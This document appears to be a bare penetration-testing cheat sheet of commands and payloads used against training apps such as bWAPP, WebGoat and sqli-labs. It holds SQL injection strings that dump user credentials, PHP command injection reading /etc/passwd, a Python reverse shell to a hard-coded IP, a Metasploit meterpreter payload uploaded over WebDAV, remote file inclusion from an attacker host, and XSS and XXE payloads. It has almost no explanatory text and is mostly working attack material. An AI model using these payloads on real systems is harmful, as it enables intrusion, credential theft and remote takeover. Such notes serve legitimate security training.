sqlmap -u "http://altoromutual.com/bank/login.aspx" --data="uid=admin&passw=pass&btnSubmit=Login" -p uid
jesse' or '1'='1 101 or 1=1
?id=1' or 1=1 --+ ?id=1' ORDER by 4 -- +
mysql -u jesse -p use mysql; use security; SELECT * FROM users WHERE id='1' UNION SELECT 1,2,3;
?id=99999' UNION SELECT 1,2,3 --+ ?id=99999' UNION SELECT 1,version(),database() --+ ?id=99999' UNION SELECT 1,user(),@@datadir --+ ?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1, group_concat(DISTINCT table_schema SEPARATOR ', '),3 FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' --+
?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1, group_concat(DISTINCT column_name SEPARATOR ', '),3 FROM information_schema.columns WHERE table_schema='security' --+
?id=-1' union select 1,group_concat(username SEPARATOR ', '), group_concat(password SEPARATOR ', ') from users --+
?id=1 ?id=1' AND 1=1 --+ ?id=1' AND 1=2 --+
mysql -u jesse -p use security; select database(); select length(database()); select substr(database(),1,1); select ascii(substr(database(),1,1)); ?id=1' AND (ascii(substr((select database()),1,1))) = ascii --+ select sleep(5); select if((select ascii(substr((select database()),1,1))) = 115, sleep(5), null); ?id=1' AND if((select ascii(substr((select database()),1,1))) = 115, sleep(5), null) --+
phpinfo() ?message=1;system('cat /proc/version'); ?message=test;system('grep -A 5 1001 /etc/passwd');
?message=test;system('hostname'); ?message=test;system('whoami'); ?message=test;system('pwd');cp /usr/share/webshells/php/php-backdoor.php /var/www/html/php-backdoor.php.txt service apache2 start
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty; pty.spawn("/bin/bash")'
tcpdump -nnttttAi eth1
$ msfconsole
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> set RPORT <RPORT>
msf> set RHOSTS <RHOST>
msf> set VERBOSE true
msf> run
$ ftp <RHOST> anonymous
$ tcpdump -nnttttAi eth1 port 20 or port 21
$ nmap -p8443 --script ssl-poodle
]> AAAAA&xxe;
]>&bWAPP;bar
PUT /WebGoat/IDOR/profile/2342388 HTTP/1.1
Host: localhost:8080
Referer: http://localhost:8080/WebGoat/start.mvc
Content-Type: application/json;
charset=utf-8
X-Requested-With: XMLHttpRequest
X-HTTP-Method-Override: POST
Cookie: JSESSIONID=39726650BD8229CE454E1B5F177CF883
Connection: close
Content-Length: 120
{ "role" : 1, "color" : "red", "size" : "small", "name" : "Buffalo Bill", "userId" : "2342388" }
$ ftp <RHOST> anonynmous
[web]bWAPP/rlfi.php?language=http://<LHOST>/evil.txt
# The null byte at the end bypasses the included '.php' added in older versions of php
[web]bWAPP/rlfi.php?language=http://<LHOST>/evil.txt%00
$ dirb http://<RHOST> | grep -i webdav
$ nikto -h http://<RHOST>/webdav/
$ cadaver http://<RHOST>/webdav/
dav> mget *
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -o evil.txt
dav> put evil.txt
$ msfconsole
msf> use exploit/multi/handler
msf> set LHOST <LHOST>
msf> set LPORT <LPORT>
msf> set PAYLOAD php/meterpreter_reverse_tcp
msf> exploit
dav> move evil.txt evil.php
dav> chexec evil.php
javascript:alert(document.cookie);
<script>alert('my javascript here')</script>
start.mvc#test/
http://localhost:9090/WebGoat/start.mvc#test/<script>alert('DOM XSS works')</script>
http://localhost:8080/WebGoat/start.mvc#test/<script>webgoat.customjs.phoneHome();</script>
<script>alert('Vulnerable to XSS')</script>
"}]}';</script><script>alert('Vulnerable to XSS')</script>